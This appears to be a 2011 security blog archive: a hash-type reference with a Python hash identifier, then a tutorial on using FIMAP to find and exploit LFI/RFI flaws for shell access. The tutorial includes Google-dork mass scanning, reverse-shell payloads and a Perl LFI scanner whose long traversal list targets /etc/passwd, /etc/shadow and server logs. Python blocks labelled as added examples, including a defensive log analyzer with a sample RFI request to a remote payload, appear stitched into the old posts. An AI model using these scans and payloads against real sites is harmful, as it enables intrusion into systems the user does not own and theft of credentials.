Tuesday, August 23, 2011

HASH TYPE REFERENCE GUIDE

I have seen numerous requests from people new and old asking what type of hash they have. There are many options out there and many algorithms used to create them, so I thought it might be helpful to provide a general reference table for people to have when they need it. This information can greatly increase your effectiveness in identifying and cracking password hashes. It provides a brief description of each type and where you might run into it. I pulled some of this from some older references and added what I could. Hope this is helpful to some folks out there…


Each entry lists the type, the length, an example, where you might find it, and a short summary.

DES(Unix)
  Length: 13 Chars
  Example: MvT4cjS8IaLNQ
  Where you might find it: *nix systems
  Summary: The first two chars are the actual salt, while the rest is the actual hash. When cracking it is not necessary to split the two.

Domain Cached Credentials (DCC)
  Length: 16 Chars
  Example: b474d48cdfc4974d86ef4d24904cdd91
  Where you might find it: Windows PCs that are members of a domain
  Summary: Computed as MD4(MD4(Unicode($pass)).Unicode(strtolower($username))).

MD5
  Length: 32 Chars (16 Bytes)
  Example: c4ca4238a0b923820dcc509a6f75849b
  Where you might find it: Used all over the place; this is by far the most common hash type
  Summary: Same as the md5() function in PHP.

MD5 (*nix)
  Length: 34 Chars
  Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
  Where you might find it: *nix systems
  Summary: The hash starts with $1$, followed by the actual salt, which ends at the third $ (max of 8 chars); everything that follows is the actual hash. It is the result of an MD5 process being called 2000 times in a row.

MD5(APR)
  Length: 37 Chars
  Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
  Where you might find it: *nix systems
  Summary: The same as MD5(*nix) above, but in $apr1$salt$hash format instead of the $1$ prefix used above.

MD5(phpBB3)
  Length: 34 Chars
  Example: $H$9123456785DAERgALpsri.D9z3ht120
  Where you might find it: phpBB forums v3.x
  Summary: Again similar to MD5(*nix), with a prefix of $H$ and no third $ to mark the end of the salt. The prefix is followed by a random digit, then the salt (up to 8 chars), then the actual hash.

MD5(Wordpress)
  Length: 34 Chars
  Example: $P$B123456780BhGFYSlUqGyE6ErKErL01
  Where you might find it: Wordpress
  Summary: The hash begins with $P$ followed by a random char, then the salt (max 8 chars), then the actual hash. The MD5 loop is run 8192 times.

md5($pass.$salt)
  Length: 32 Chars (16 Bytes)
  Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234
  Where you might find it: Used in WB News, Joomla version 1.0.13 and higher
  Summary: The ":" is a common symbol used in hashing to separate the actual hash from the salt. You need the salt to crack the password hash, and it may or may not need to be manually separated depending on which tools you use.

md5($salt.$pass)
  Length: 32 Chars (16 Bytes)
  Example: f190ce9ac8445d249747cab7be43f7d5:12
  Where you might find it: osCommerce, AEF, Gallery and other CMS types
  Summary: See above.

md5(md5($pass))
  Length: 32 Chars
  Example: 28c8edde3d61a0411511d3b1866f0636
  Where you might find it: Used in e107, DLE, AVE, Diferior, Koobi and other CMS
  Summary: You can treat this as a standard MD5 from a cracking point of view.

md5(md5($pass).$salt)
  Length: 32 Chars (16 Bytes)
  Example: 6011527690eddca23580955c216b1fd2:wQ6
  Where you might find it: Used in vBulletin, IceBB
  Summary: Uses a salt, so it may require special handling of the salt depending on what you use for cracking; otherwise treat as normal MD5.

md5(md5($salt).md5($pass))
  Length: 32 Chars (16 Bytes)
  Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S
  Where you might find it: Used in IPB.
  Summary: See above.

md5(md5($salt).$pass)
  Length: 32 Chars (16 Bytes)
  Example: 816a14db44578f516cbaef25bd8d8296:1234
  Where you might find it: Used in MyBB.
  Summary: See above.

md5($salt.$pass.$salt)
  Length: 32 Chars (16 Bytes)
  Example: a3bc9e11fddf4fef4deea11e33668eab:1234
  Where you might find it: Used in TBDev.
  Summary: See above.

md5($salt.md5($salt.$pass))
  Length: 32 Chars (16 Bytes)
  Example: 1d715e52285e5a6b546e442792652c8a:1234
  Where you might find it: Used in DLP
  Summary: See above.

MySQL <=4
  Length: 16 Chars (8 Bytes)
  Example: 606717496665bcba
  Where you might find it: MySQL <=4
  Summary: The hash consists of two DWORDs, each not exceeding the value 0x7fffffff.

MySQL >=5
  Length: 40 Chars (20 Bytes)
  Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
  Where you might find it: MySQL >=5
  Summary: Computed with the SHA-1(SHA-1($pass)) algorithm. The asterisk is often seen in the database but is not actually used for cracking or by the programs.

RAdmin v2.x
  Length: 32 Chars (16 Bytes)
  Example: 5e32cceaafed5cc80866737dfb212d7f
  Where you might find it: Used in the application Remote Administrator v2.x.
  Summary: The password is padded with zeros to a length of 100 bytes, then that entire string is hashed with the MD5 algorithm.

SHA-1
  Length: 40 Chars (20 Bytes)
  Example: 356a192b7913b04c54574d18c28d46e6395428ab
  Where you might find it: Very commonly used in forum and CMS applications
  Summary: Same as the sha1() function in PHP.

sha1(strtolower($username).$pass)
  Length: 40 Chars (20 Bytes)
  Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
  Where you might find it: Used in SMF

sha1($salt.sha1($salt.sha1($pass)))
  Length: 40 Chars (20 Bytes)
  Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
  Where you might find it: Used in Woltlab BB.

SHA-256(Unix)
  Length: 55 Chars
  Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi
  Where you might find it: *nix systems
  Summary: The prefix is $5$, followed by the salt (up to 8 chars), followed by the actual hash: $5$Salt$Hash. It is the result of the SHA-256 algorithm being run 5000 times.

SHA-512(Unix)
  Length: 98 Chars
  Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm
  Where you might find it: *nix systems
  Summary: Same as above, although the prefix is $6$Salt$Hash instead of the five above, and it is the result of the SHA-512 algorithm being run 5000 times.
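The prefix and length rules in the table can be turned into a small identifier. The Python below is an added example (not from the original post, and not Join7's analyzer): identify() recognises the formats above and splits out the salt, and matching_formulas() recomputes the table's MD5/SHA-1 constructions for one candidate password, which is the same comparison a login routine performs. The MD5 and SHA-1 examples in the table are the digests of the string "1"; the iterated crypt formats ($1$, $apr1$, $H$, $P$, $5$, $6$) are identified only, not recomputed.

```python
import hashlib
import re

# Unix crypt-style prefixes from the table: the salt runs to the next '$' unless noted.
PREFIXED = [
    ("$apr1$", "MD5(APR)"),
    ("$1$", "MD5 (*nix)"),
    ("$5$", "SHA-256(Unix)"),
    ("$6$", "SHA-512(Unix)"),
    ("$H$", "MD5(phpBB3)"),
    ("$P$", "MD5(Wordpress)"),
]
# phpBB3/Wordpress: one round-count char, then up to 8 salt chars, no third '$'
NO_THIRD_DOLLAR = {"MD5(phpBB3)", "MD5(Wordpress)"}

# Bare hex digests with no salt in the string, keyed by hex length
BY_LENGTH = {
    16: ["MySQL <=4"],
    32: ["MD5", "Domain Cached Credentials (DCC)", "md5(md5($pass))", "RAdmin v2.x"],
    40: ["SHA-1"],
}
# hash:salt forms from the table, keyed by hex length of the digest part
SALTED = {
    32: ["md5($pass.$salt)", "md5($salt.$pass)", "md5(md5($pass).$salt)",
         "md5(md5($salt).md5($pass))", "md5(md5($salt).$pass)",
         "md5($salt.$pass.$salt)", "md5($salt.md5($salt.$pass))"],
    40: ["sha1($salt.sha1($salt.sha1($pass)))"],
}
HEX = re.compile(r"^[0-9a-fA-F]+$")


def identify(stored):
    """Return (candidate type names, hex digest or None, salt or None) for one stored string."""
    for prefix, name in PREFIXED:
        if stored.startswith(prefix):
            body = stored[len(prefix):]
            salt = body[1:9] if name in NO_THIRD_DOLLAR else body.split("$", 1)[0]
            return [name], None, salt
    if stored.startswith("*") and len(stored) == 41 and HEX.match(stored[1:]):
        return ["MySQL >=5"], stored[1:], None
    if ":" in stored:
        left, right = stored.split(":", 1)
        if HEX.match(left) and len(left) in SALTED:              # hash:salt
            return list(SALTED[len(left)]), left.lower(), right
        if HEX.match(right) and len(right) == 40:                # username:hash (SMF)
            return ["sha1(strtolower($username).$pass)"], right.lower(), left.lower()
    if HEX.match(stored) and len(stored) in BY_LENGTH:
        return list(BY_LENGTH[len(stored)]), stored.lower(), None
    if re.match(r"^[./0-9A-Za-z]{13}$", stored):                 # DES crypt: 2 salt chars + 11
        return ["DES(Unix)"], None, stored[:2]
    return [], None, None


def _md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def _sha1(s):
    return hashlib.sha1(s.encode()).hexdigest()


# The constructions the table spells out, as functions of (password, salt).
FORMULAS = {
    "MD5": lambda p, s: _md5(p),
    "md5(md5($pass))": lambda p, s: _md5(_md5(p)),
    "md5($pass.$salt)": lambda p, s: _md5(p + s),
    "md5($salt.$pass)": lambda p, s: _md5(s + p),
    "md5(md5($pass).$salt)": lambda p, s: _md5(_md5(p) + s),
    "md5(md5($salt).md5($pass))": lambda p, s: _md5(_md5(s) + _md5(p)),
    "md5(md5($salt).$pass)": lambda p, s: _md5(_md5(s) + p),
    "md5($salt.$pass.$salt)": lambda p, s: _md5(s + p + s),
    "md5($salt.md5($salt.$pass))": lambda p, s: _md5(s + _md5(s + p)),
    "SHA-1": lambda p, s: _sha1(p),
    "sha1(strtolower($username).$pass)": lambda p, s: _sha1(s + p),
    "sha1($salt.sha1($salt.sha1($pass)))": lambda p, s: _sha1(s + _sha1(s + _sha1(p))),
    # MySQL >=5 hashes the *binary* inner digest, then upper-cases the hex
    "MySQL >=5": lambda p, s: hashlib.sha1(hashlib.sha1(p.encode()).digest()).hexdigest().upper(),
}


def matching_formulas(stored, candidate):
    """Names of the identified constructions under which `candidate` reproduces `stored`
    (the same comparison a login routine makes for one password)."""
    names, digest, salt = identify(stored)
    if digest is None:
        return []
    return [n for n in names if n in FORMULAS and FORMULAS[n](candidate, salt or "") == digest]


if __name__ == "__main__":
    for h in ("$1$12345678$XM4P3PrKBgKNnTaqG9P0T/", "Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a",
              "6f04f0d75f6870858bae14ac0b6d9f73:1234", "c4ca4238a0b923820dcc509a6f75849b"):
        print(h, "->", identify(h))
    print(matching_formulas("c4ca4238a0b923820dcc509a6f75849b", "1"))
```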


If you are interested in an online hash type analyzer then you can check out a project that Join7 is working on. It is still in testing and the site is under construction in certain areas as he works to develop more applications and options. You can find it here: http://join7.koolserve.com/ He has also developed an automated SQL column counter as well as a hash lookup/cracking service (which was still under major development last I checked). I hope you enjoy this share and until next time, Enjoy!

Friday, August 19, 2011

AUTOMATED LFI/RFI SCANNING & EXPLOITING WITH FIMAP

Today I am going to show you how to use a Python based tool called FIMAP to perform automated LFI exploitation to gain shell access on our target site. Hunting for LFI vulnerabilities is a bit like hunting for SQL injection vulnerabilities, but more time consuming, and these days there are fewer and fewer machines out there that are straight up vulnerable. FIMAP comes to our aid to take care of a lot of the manual effort, which helps to speed things up and increase our chances of gaining remote shell access. Manually crafting the requests to test for LFI vulnerabilities is painstaking, and this is why I find this tool to be extremely helpful. It automates the whole process and comes with built in exploits that actually work. It is capable of running single target scans, Google dork scans, and mass scans from a list file. It can also crawl a target site and create a list file which can be used afterwards with the mass scan mode. Here goes…

Pre-requisites:
·         Python installed on your system already
·         Download a copy of FIMAP here: http://code.google.com/p/fimap/downloads/list
·         Brain power & patience :)

OK, so assuming you already have Python installed, you will download the latest version of FIMAP from its Google Code home, extract it to your desired location, and then we can begin. You will need to open your command prompt and navigate to the extraction point (unless you added things to your global environment PATH). You can type "fimap.py -h" to see a quick overview of what options are available; it should look like this:

It looks like a lot at first, but once you review it the syntax and options are fairly easy to pick up, as most of the options and arguments are tied to whichever mode you are using. There are four basic modes: single scan, mass scan, Google scan, and Harvest mode. Single scan performs an LFI check and audit against a single URL. You just supply the URL to scan and it goes to work.

COMMAND: fimap.py -s -u http://target-site.com/index2.php?x=

If you are only going to be scanning a single target site then I highly suggest you run a scan using the Harvester mode first to help increase the chances of finding a vulnerable link. You can simply point FIMAP at the root directory of a site in Harvester mode and it will generate an output file for you to feed into the Mass scan. It looks like this:

COMMAND: fimap.py -H -u http://target-site.com/ -w output.txt
NOTE: You can define the crawl depth by adding the "-d <number of pages to crawl>" flag, as the default is set to 1:

COMMAND: fimap.py -H -u http://target-site.com/ -d 3 -w output.txt

Now that we have our output file we can follow up by switching to the Mass scan mode and auditing all of the links we found with the Harvester mode. You just point it at the output.txt file from the steps above and let it do its thing, like so:

COMMAND: fimap.py -m -l /path/to/list/output.txt


If you prefer to run some large scans using Google and your favorite Google dorks you can switch modes and use the following syntax:

COMMAND: fimap.py -g -q inurl:index2.php?x=


It runs much like the mass scan mode until it reaches the end of the results…
NOTE: You can further define the Google scan parameters by setting the time between Google requests with "--googlesleep=<time>" and the number of result pages to read with "-p <page number>". If you define the number of pages to read you can also set the number of results per page with "--results=<10,25,50,100>", with 100 being the default value. The full syntax would look like this:

COMMAND: fimap.py -g -q inurl:index2.php?x= --googlesleep=5000 -p 15 --results=50

Once you have run your scans you will be wondering where the results are stored. You can find them in two files, which you will need to search for on your system: fimap_results (xml) and fimap-log (txt). These two files contain the stored results from all of your scans. Their location depends on what type of system you are using, so just use the run box or the locate command to find them. You can also run with "-x" to see a list of possible targets to perform exploitation attempts against, in a nice, easy to follow interactive session:

COMMAND: fimap.py -x


 
Simply choose the desired target by entering the number provided. Once a target is selected you will have the opportunity of choosing which vulnerable link to try to exploit. It looks like this:

Once you choose the link to exploit you will have the chance to choose the final payload to use. The default options consist of an integrated shell on the target site or a reverse shell which you can connect to using NetCat on your local system. The fimap shell is not an interactive shell, so you will not be able to use services like SSH, but you can use it to gain a foothold for further escalation and rooting. Choose your payload, connect, and enjoy. Here are the end results of a successful exploit using the fimap shell:

You can also play with the configuration file to add some additional features. Most notably you can add support for testing RFI vulnerabilities as well. You simply add your hosting details for your shell of choice into the "config.py" file, save, and then perform a quick test to see if it is working. Here are the lines that need to be edited (the fields currently set to None are the editable ones); I suggest using the FTP mode if you have the ability to host your shell somewhere:

# FTP Mode
settings["dynamic_rfi"]["ftp"] = {}
settings["dynamic_rfi"]["ftp"]["ftp_host"] = None
settings["dynamic_rfi"]["ftp"]["ftp_user"] = None
settings["dynamic_rfi"]["ftp"]["ftp_pass"] = None
settings["dynamic_rfi"]["ftp"]["ftp_path"] = None # A non existing file without suffix. Example: /home/imax/public_html/payload
settings["dynamic_rfi"]["ftp"]["http_map"] = None # The mapped HTTP path of the file. Example: http://localhost/~imax/payload

# Local Mode
settings["dynamic_rfi"]["local"] = {}
settings["dynamic_rfi"]["local"]["local_path"] = None   # A non existing file on your filesystem without prefix which is reachable by http. Example: /var/www/payload
settings["dynamic_rfi"]["local"]["http_map"]   = None   # The http url of the file without prefix where the file is reachable from the web. Example: http://localhost/payload

Here is the command to test your RFI configuration to see if it will work for exploiting vulnerable links:

COMMAND: fimap.py --test-rfi

This covers the basic usage for FIMAP. This tool is still under development so I encourage you to follow the project for more updates to come. If you want to truly learn how LFI works, then I encourage you to try this out manually after you have found a few with the assistance of the tool. I have also included a modified Perl script below which does some more thorough testing for file presence but is not nearly as full featured, nor is it the quietest tool. Please use responsibly and until next time, Enjoy!
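From the defender's side, the probes these scanners send are easy to spot in web-server logs. The following Python is an added example (not part of the original post or of fimap): it parses Apache combined-format lines, percent-decodes each query-string value (repeatedly, so double encoding does not hide the pattern), flags traversal sequences, %00 null bytes, the sensitive file names from the Perl script's list below and remote URLs in parameters (the RFI case), then reports sources that send such requests in bursts. The log lines are constructed samples; the libwww-perl user agent is what LWP::UserAgent sends unless a script overrides it.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format sample (not real traffic): one ordinary
# request, then a burst from one source that mirrors what an LFI scanner sends:
# plain and %00-terminated traversal, percent-encoded traversal, and a remote
# URL in the parameter (the RFI case).
SAMPLE_LOG = """\
203.0.113.7 - - [19/Aug/2011:10:00:01 -0500] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [19/Aug/2011:10:00:05 -0500] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 1832 "-" "libwww-perl/6.02"
198.51.100.23 - - [19/Aug/2011:10:00:05 -0500] "GET /index.php?page=../../../etc/passwd%00 HTTP/1.1" 500 612 "-" "libwww-perl/6.02"
198.51.100.23 - - [19/Aug/2011:10:00:06 -0500] "GET /index.php?page=%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron HTTP/1.1" 200 2210 "-" "libwww-perl/6.02"
198.51.100.23 - - [19/Aug/2011:10:00:06 -0500] "GET /index.php?page=http://203.0.113.99/payload.txt? HTTP/1.1" 200 90 "-" "libwww-perl/6.02"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# File names the Perl script's wordlist probes for, matched after decoding
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/group", "/etc/security/",
             "/proc/self/environ", "access_log", "error_log", "access.log", "error.log")


def fully_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value):
    """Indicators present in one (decoded) query-string value."""
    v = fully_decode(value)
    low = v.lower()
    hits = set()
    if "../" in v or "..\\" in v:
        hits.add("traversal")
    if "\x00" in v:                          # %00 truncation attempt
        hits.add("null-byte")
    if any(name in low for name in SENSITIVE):
        hits.add("sensitive-file")
    if re.match(r"^(https?|ftp)://", low):   # remote include attempt
        hits.add("remote-url")
    return hits


def analyze(log_text):
    """Parse each line, inspect every query-string value, return flagged requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                         # not a combined-format line
        query = urlsplit(m["target"]).query
        # keep_blank_values so a probe such as "?x=" still yields the key
        for key, value in parse_qsl(query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                findings.append({
                    "ip": m["ip"], "param": key, "status": m["status"],
                    "ua": m["ua"], "indicators": sorted(hits),
                })
    return findings


def burst_sources(findings, threshold=3):
    """Sources with at least `threshold` flagged requests; automated scanners
    walk many traversal depths per file, so they cross this quickly."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    flagged = analyze(SAMPLE_LOG)
    for f in flagged:
        print(f["ip"], f["param"], f["status"], ",".join(f["indicators"]), f["ua"])
    print("burst sources:", burst_sources(flagged))
```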


BONUS PERL LFI SCRIPT:
Save the below as “file.pl” and then run using “perl file.pl” and then just enter your target site…

#!/usr/bin/perl
#modified by: Hood3dRob1n
use LWP::UserAgent;
use HTTP::Request;
system($^O eq 'MSWin32' ? 'cls' : 'clear');   # clear the screen on Windows or *nix
print "=======================================================\n";
print "=                                                     =\n";
print "=                 LFI_scanner v 0.1.5                 =\n";
print "=              ~[ HR Updated Version ]~               =\n";
print "=                                                     =\n";
print "=     input the site: www.memek.com/index.php?id=     =\n";
print "=                                                     =\n";
print "=======================================================\n\n";
print '>'; chomp($link = <STDIN>);
if($link !~ /http:\/\//) { $link = "http://$link"; }
#httpd type scan
print "\n>press [enter] to check the version of httpd[...]\n";
$httpd = <STDIN>;
$host = $link;
$useragent = LWP::UserAgent->new;
$resp = $useragent->head($host);
print $resp->headers_as_string;
print "\n>press [enter] to check the vulnerability in lfi[...]\n";
$start = <STDIN>;
@vuls = ('/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'/proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'/proc/self/environ%00',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00',
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'/etc/group',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'/etc/group%00',
'../etc/group%00',
'../../etc/group%00',
'../../../etc/group%00',
'../../../../etc/group%00',
'../../../../../etc/group%00',
'../../../../../../etc/group%00',
'../../../../../../../etc/group%00',
'../../../../../../../../etc/group%00',
'../../../../../../../../../etc/group%00',
'../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../etc/group%00',
'/etc/security/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'/etc/security/group%00',
'../etc/security/group%00',
'../../etc/security/group%00',
'../../../etc/security/group%00',
'../../../../etc/security/group%00',
'../../../../../etc/security/group%00',
'../../../../../../etc/security/group%00',
'../../../../../../../etc/security/group%00',
'../../../../../../../../etc/security/group%00',
'../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../../etc/security/group%00',
'/etc/user',
'../etc/user',
'../../etc/user',
'../../../etc/user',
'../../../../etc/user',
'../../../../../etc/user',
'../../../../../../etc/user',
'../../../../../../../etc/user',
'../../../../../../../../etc/user',
'../../../../../../../../../etc/user',
'../../../../../../../../../../etc/user',
'../../../../../../../../../../../etc/user',
'/etc/user%00',
'../etc/user%00',
'../../etc/user%00',
'../../../etc/user%00',
'../../../../etc/user%00',
'../../../../../etc/user%00',
'../../../../../../etc/user%00',
'../../../../../../../etc/user%00',
'../../../../../../../../etc/user%00',
'../../../../../../../../../etc/user%00',
'../../../../../../../../../../etc/user%00',
'../../../../../../../../../../../etc/user%00',
'/etc/shadow',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'/etc/shadow%00',
'../etc/shadow%00',
'../../etc/shadow%00',
'../../../etc/shadow%00',
'../../../../etc/shadow%00',
'../../../../../etc/shadow%00',
'../../../../../../etc/shadow%00',
'../../../../../../../etc/shadow%00',
'../../../../../../../../etc/shadow%00',
'../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../etc/shadow%00',
'/etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'/etc/security/passwd%00',
'../etc/security/passwd%00',
'../../etc/security/passwd%00',
'../../../etc/security/passwd%00',
'../../../../etc/security/passwd%00',
'../../../../../etc/security/passwd%00',
'../../../../../../etc/security/passwd%00',
'../../../../../../../etc/security/passwd%00',
'../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../etc/security/passwd%00',
'/etc/security/user',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'/etc/security/user%00',
'../etc/security/user%00',
'../../etc/security/user%00',
'../../../etc/security/user%00',
'../../../../etc/security/user%00',
'../../../../../etc/security/user%00',
'../../../../../../etc/security/user%00',
'../../../../../../../etc/security/user%00',
'../../../../../../../../etc/security/user%00',
'../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../etc/security/user%00',
'/etc/security/environ',
'../etc/security/environ',
'../../etc/security/environ',
'../../../etc/security/environ',
'../../../../etc/security/environ',
'../../../../../etc/security/environ',
'../../../../../../etc/security/environ',
'../../../../../../../etc/security/environ',
'../../../../../../../../etc/security/environ',
'../../../../../../../../../etc/security/environ',
'../../../../../../../../../../etc/security/environ',
'../../../../../../../../../../../etc/security/environ',
'/etc/security/environ%00',
'../etc/security/environ%00',
'../../etc/security/environ%00',
'../../../etc/security/environ%00',
'../../../../etc/security/environ%00',
'../../../../../etc/security/environ%00',
'../../../../../../etc/security/environ%00',
'../../../../../../../etc/security/environ%00',
'../../../../../../../../etc/security/environ%00',
'../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../../etc/security/environ%00',
'/etc/security/limits',
'../etc/security/limits',
'../../etc/security/limits',
'../../../etc/security/limits',
'../../../../etc/security/limits',
'../../../../../etc/security/limits',
'../../../../../../etc/security/limits',
'../../../../../../../etc/security/limits',
'../../../../../../../../etc/security/limits',
'../../../../../../../../../etc/security/limits',
'../../../../../../../../../../etc/security/limits',
'../../../../../../../../../../../etc/security/limits',
'/etc/security/limits%00',
'../etc/security/limits%00',
'../../etc/security/limits%00',
'../../../etc/security/limits%00',
'../../../../etc/security/limits%00',
'../../../../../etc/security/limits%00',
'../../../../../../etc/security/limits%00',
'../../../../../../../etc/security/limits%00',
'../../../../../../../../etc/security/limits%00',
'../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../../etc/security/limits%00',
'/usr/lib/security/mkuser.default',
'../usr/lib/security/mkuser.default',
'../../usr/lib/security/mkuser.default',
'../../../usr/lib/security/mkuser.default',
'../../../../usr/lib/security/mkuser.default',
'../../../../../usr/lib/security/mkuser.default',
'../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../usr/lib/security/mkuser.default',
'/usr/lib/security/mkuser.default%00',
'../usr/lib/security/mkuser.default%00',
'../../usr/lib/security/mkuser.default%00',
'../../../usr/lib/security/mkuser.default%00',
'../../../../usr/lib/security/mkuser.default%00',
'../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'/apache/logs/access.log',
'../apache/logs/access.log',
'../../apache/logs/access.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/access.log',
'../../../../../../apache/logs/access.log',
'../../../../../../../apache/logs/access.log',
'../../../../../../../../apache/logs/access.log',
'../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../apache/logs/access.log',
'/apache/logs/access.log%00',
'../apache/logs/access.log%00',
'../../apache/logs/access.log%00',
'../../../apache/logs/access.log%00',
'../../../../apache/logs/access.log%00',
'../../../../../apache/logs/access.log%00',
'../../../../../../apache/logs/access.log%00',
'../../../../../../../apache/logs/access.log%00',
'../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../apache/logs/access.log%00',
'/apache/logs/error.log',
'../apache/logs/error.log',
'../../apache/logs/error.log',
'../../../apache/logs/error.log',
'../../../../apache/logs/error.log',
'../../../../../apache/logs/error.log',
'../../../../../../apache/logs/error.log',
'../../../../../../../apache/logs/error.log',
'../../../../../../../../apache/logs/error.log',
'../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../apache/logs/error.log',
'/apache/logs/error.log%00',
'../apache/logs/error.log%00',
'../../apache/logs/error.log%00',
'../../../apache/logs/error.log%00',
'../../../../apache/logs/error.log%00',
'../../../../../apache/logs/error.log%00',
'../../../../../../apache/logs/error.log%00',
'../../../../../../../apache/logs/error.log%00',
'../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../apache/logs/error.log%00',
'/etc/httpd/logs/acces_log',
'../etc/httpd/logs/acces_log',
'../../etc/httpd/logs/acces_log',
